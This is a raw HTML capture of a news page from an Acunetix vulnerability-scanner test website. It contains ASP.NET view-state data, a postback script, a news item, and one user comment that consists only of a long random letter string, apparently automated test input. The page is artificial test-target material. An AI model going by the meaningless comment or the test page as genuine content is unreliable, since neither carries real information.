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" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKl38zuAgKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOlLHWzw0p4sqnAMsgHjAo6suUUO" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 5:50:06 AM</DIV><DIV class="CommentText">hteLUTPmLvVvWGoKVsqwffTWrynmiZJjjNNrFbJqoeGxqjDAeUEibSWZKfhBNrYPufKMhRZtpWivRWihDBNIpGmVVtZKWnVGxBNlZKlKPDseXSiBChCNjYOJKkeUomKYiPxUUjQdvqoTXhrgJERNURXvVSJHuSyCKjmFBnBSnTxQuRVWCXsrEtRrqXdiLNJYKyMeKUZiymjAyJVQacjQMmjJubhLnoNybvhmPaSJPTmBlGMxhKFxWEyRHaQCDfaINIDOOekRqJIyvXkRlNPpwRLArqrQdFnNXSQnsnNGFimrcVdkdhrvcLNawKfXGbpgTYCreZKFyKORIDAmMDNwbgUOxWHJYTcppjZcSRICfSaiLoIwcsynvUcJRvgofgZDYEtkTRsInrJOfqOGciQtehkXBtspmqhSKZBJTowumOrCqtsJBUOjGfcZleenjYOmQqPOcHYKpwJcKsqTbqjPApvTYKqhyjCBYPnsMGJbicWHWPOdcVNgQZdvHcKHIubEolYjXXVOHkAGHJcfYtVYxrmhgFcMuAKcnceHVGSYuZqHjKELJMtuCJtTelpEbKUGlrDetQTQxnhiWcQwgRRnuGbogSpbqhvqbAvgUnpXtWCoTmQwkTOgmhEXsyTsdssMiuZZiyqYoRWYNXrxOvIElbIPZxEQClRNjuYRceqvYxwcexZbILMeReTKNNXELVhpTbfdmACtUPGYkWqfRkkfABaVqYCuVKJAGGaYBFNITecslcuvgqfMpRUqXYMQGcNkwqnKqlrejOiRGJDGIXhCCWcvvBCMAyVZdnYJCorcxwYYybKfUUfukSoQcnEoxxDfJaEkkBSnJdjlwcxZCAweULTcKytxsqwVEwrSbBnEUmFFIFKxHRRJpDcraVpXiglKVtBPcAAffsHIvEfmXfEtetcNvQEfrNfhoZXNcHXJgSOYCVMdCtUKhyOeZakrcGshkesTuxfOvgRyjLkbspmmepdlNpgSjCmOdTptmxFPZXdOySQQejMVmsTWwjjwVjqDstDjgyxXJsZJCPNOSfDyiHBmoFODMODbrDBTkjqJnkHeghLkQxYvZwiaoUgsyFXoNgyEiHRMijfCYsTRXmbLdovdyfNYMxPJPhZLwyQVWIWefQMHYAOHLfZYNUXHWAiNDqHDjLSKiGymhEvFdgmYbnSLNWUObttBNBFlRdsYeYUGtjxcKRltJvkCRZhTdMcfmwvlSFStBftMYXRKThRtkqSnqYQpwWGjaUXTVnMJfFNqZBhjWAOsRHEOUOVyRPFimoNUct